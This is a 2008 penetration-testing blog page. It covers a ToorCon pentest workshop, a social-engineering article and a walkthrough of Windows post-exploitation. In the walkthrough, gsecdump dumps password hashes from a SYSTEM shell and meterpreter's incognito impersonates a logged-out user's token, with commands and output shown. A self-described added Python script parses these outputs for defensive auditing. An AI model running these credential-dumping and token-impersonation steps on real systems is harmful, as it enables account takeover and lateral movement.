Tuesday, September 30, 2008

Why Blog?

Richard Bejtlich has a really good post on his blog entitled "Why Blog".

He lists five things:

  1. Blogging organizes thoughts.

  2. Blogging captures and shares thoughts.

  3. Blogging facilitates public self-expression.

  4. Blogging establishes communities.

  5. Blogging can contribute original knowledge faster than any other medium.

I'll let you read the blog for the discussion on the five things but I've really enjoyed blogging.

I mostly keep the blog as my note taking canvas (for notes I want to share with others) but RB's five reasons are reasons I blog as well.

Sunday, September 14, 2008

Toorcon X Workshop

As I mentioned before, Joe and I are doing a Crash Course In Pentesting 2 day workshop at ToorconX.

http://sandiego.toorcon.org/content/section/4/8/

Here's a piece from the description:

"This course will cover some of the newer aspects of pen-testing covering; Open Source Intelligence Gathering with Maltego and other Open Source tools, Scanning, Enumeration, Exploitation (Both remote and client-side) and Post-Exploitation relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the Whitebox and Blackbox approach keeping stealth in mind for our Blackbox activities.

Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection."

But I wanted to give a few more details.

Day 1 is network level pentesting and Day 2 is web application pentesting.

Network level is mostly my responsibility, and I'll be focusing on black box information gathering, client side attacks, and post exploitation. It's hard to cover pentesting in a day, so I'll be talking heavily about client side attacks, how to work them into your pentests, and some of the tools you'll need to do it. There will also be a little on local/privilege escalation attacks, which you'll need once you have that userland shell, and on post exploitation. There is also a block on Metasploit, and the students will take home a copy of LSO's Metasploit Mini Course.

Web application is Joe's responsibility and it should be really good. We've had a custom web app built with vulnerabilities intentionally built in, so the students will be able to run the tools he is going to discuss and then exploit the vulnerabilities they find. They also get to take the VM home with them.

If you have questions feel free to post up or email me with them.

Friday, September 12, 2008

passing the hash with gsecdump and msvctl (yes more)

Just a follow-up post on gsecdump and msvctl after doing prep for the post exploitation topics for the Toorcon workshop.

For some reason I thought that gsecdump would not require admin privileges; this is incorrect, it requires admin or SYSTEM on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).

"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."

OK, so you still need admin or higher, but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. The key there is active logon sessions. So if you are userland and admin or higher, you might be stuck with that user's hash, because once they log out the active logon session hash seems to disappear (sometimes??), but if you get a SYSTEM shell you might get some of the previously logged in users.

example:
#popped a system shell and got a command shell with meterpreter

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged into the box as nobody

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things go back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But once you have a hash, any user can use that hash, whereas you have to be admin/SYSTEM to pass tokens.

Let's see the same scenario with incognito:

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#login as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#log out as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody

meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
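Both transcripts above make the same point from two angles: a user's hash shows up in gsecdump only while the logon session is active, and with incognito the user's token drops from "delegation" to "impersonation" after logout. The script below is an added example, not code from the original post or from gsecdump/incognito; it parses the two output formats exactly as they appear above (pwdump-style lines from gsecdump -u, and the section layout of list_tokens -u) and builds a per-account timeline of what each snapshot exposed. The sample outputs are constructed from the post's transcripts; the snapshot labels, function names, and the two well-known empty-hash constants used for the LM/NT checks are my additions.

```python
# Added example (not from the original post, gsecdump or incognito).
# Parses gsecdump -u and incognito list_tokens -u output and reports, per
# account and per snapshot, whether a hash and/or a token was visible.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# pwdump layout: user:rid:LMhash:NThash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>[^:]*):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_gsecdump(text):
    """Return {account: (lm, nt)}; prompts, echoed commands and comments never match."""
    hashes = {}
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            hashes[m["user"]] = (m["lm"].lower(), m["nt"].lower())
    return hashes


def parse_list_tokens(text):
    """Return {account: 'delegation' | 'impersonation'} from list_tokens -u output."""
    tokens, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Delegation Tokens"):
            section = "delegation"
        elif line.startswith("Impersonation Tokens"):
            section = "impersonation"
        elif not line or line.startswith(("=", "#", "meterpreter >")):
            continue  # separators, comments, prompts
        elif section:
            tokens[line] = section
    return tokens


def hash_flags(lm, nt):
    """Audit flags a defender cares about for one dumped account."""
    flags = []
    if lm != EMPTY_LM:
        flags.append("LM hash stored")   # LM hashes should not be stored at all
    if nt == EMPTY_NT:
        flags.append("empty password")
    return flags


def exposure_timeline(snapshots):
    """snapshots: [(label, gsecdump_text, list_tokens_text), ...]
    Returns {account: [(label, hash_visible, token_kind_or_None), ...]}."""
    parsed, accounts = [], set()
    for label, dump, toks in snapshots:
        h, t = parse_gsecdump(dump), parse_list_tokens(toks)
        parsed.append((label, h, t))
        accounts |= set(h) | set(t)
    timeline = defaultdict(list)
    for label, h, t in parsed:
        for acct in sorted(accounts):
            timeline[acct].append((label, acct in h, t.get(acct)))
    return dict(timeline)


# Constructed sample outputs, taken from the three points in time in the post.
DUMP_SYSTEM_ONLY = r"""
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
DUMP_NOBODY_LOGGED_IN = r"""
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
_BASE_TOKENS = "NT AUTHORITY\\LOCAL SERVICE\nNT AUTHORITY\\NETWORK SERVICE\nNT AUTHORITY\\SYSTEM\n"
TOKENS_BEFORE = "Delegation Tokens Available\n====\n" + _BASE_TOKENS + \
    "\nImpersonation Tokens Available\n====\nNT AUTHORITY\\ANONYMOUS LOGON\n"
TOKENS_LOGGED_IN = TOKENS_BEFORE.replace(_BASE_TOKENS, _BASE_TOKENS + "XPSP1VM\\nobody\n")
TOKENS_LOGGED_OUT = TOKENS_BEFORE + "XPSP1VM\\nobody\n"

SNAPSHOTS = [
    ("before", DUMP_SYSTEM_ONLY, TOKENS_BEFORE),
    ("nobody logged in", DUMP_NOBODY_LOGGED_IN, TOKENS_LOGGED_IN),
    ("nobody logged out", DUMP_SYSTEM_ONLY, TOKENS_LOGGED_OUT),
]

if __name__ == "__main__":
    for acct, rows in exposure_timeline(SNAPSHOTS).items():
        print(acct)
        for label, has_hash, token in rows:
            print(f"  {label:18} hash={has_hash!s:5} token={token}")
    for acct, (lm, nt) in parse_gsecdump(DUMP_NOBODY_LOGGED_IN).items():
        print(acct, hash_flags(lm, nt))
```

Run it and the nobody row reads hash=True/token=delegation while logged in, then hash=False/token=impersonation after logout, while the machine account's hash is present in every snapshot; that is the distinction the post draws between hash dumping and token stealing. The audit flags also show why the nobody line matters to a defender: a non-empty LM field means the host still stores LM hashes, which is a configuration finding in its own right.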

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed, because msvctl pops up a whole new command shell. That is kind of a bummer with a remote shell; you'll have to use the Pass-the-Hash Toolkit instead.

Some other reading on gsecdump and msvctl:
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml

http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also, I was doing some googling on pass the hash and came across this post on the pass the hash problem, best part quoted below.

http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:

"Hash injection mitigation? - Steve Riley [MSFT], 06-Oct-07: In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are far more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...

Mike Murray on Human Exploitation 101

http://www.ethicalhacker.net/content/view/209/1/

From the article:

"This is going to be all about dealing face-to-face (or voice-to-voice or text-to-text) with real live people and exploiting the natural tendency to trust.

Of course, this skill underpins everything else that we do when on a social-engineering engagement - in order to impersonate a UPS guy, talk someone out of their password, write a great targeted phishing email, or know exactly where to drop the USB keys - you have to have great skills at exploiting the natural tendencies of humans.

This means a deep understanding of the three fundamental skills (that I have mentioned often in introductory talks and articles on this topic) - the ability to communicate, the ability to be aware of your surroundings, and your ability to control the context (or "cognitive frame") of your interaction."

Human 0days are promised in the future!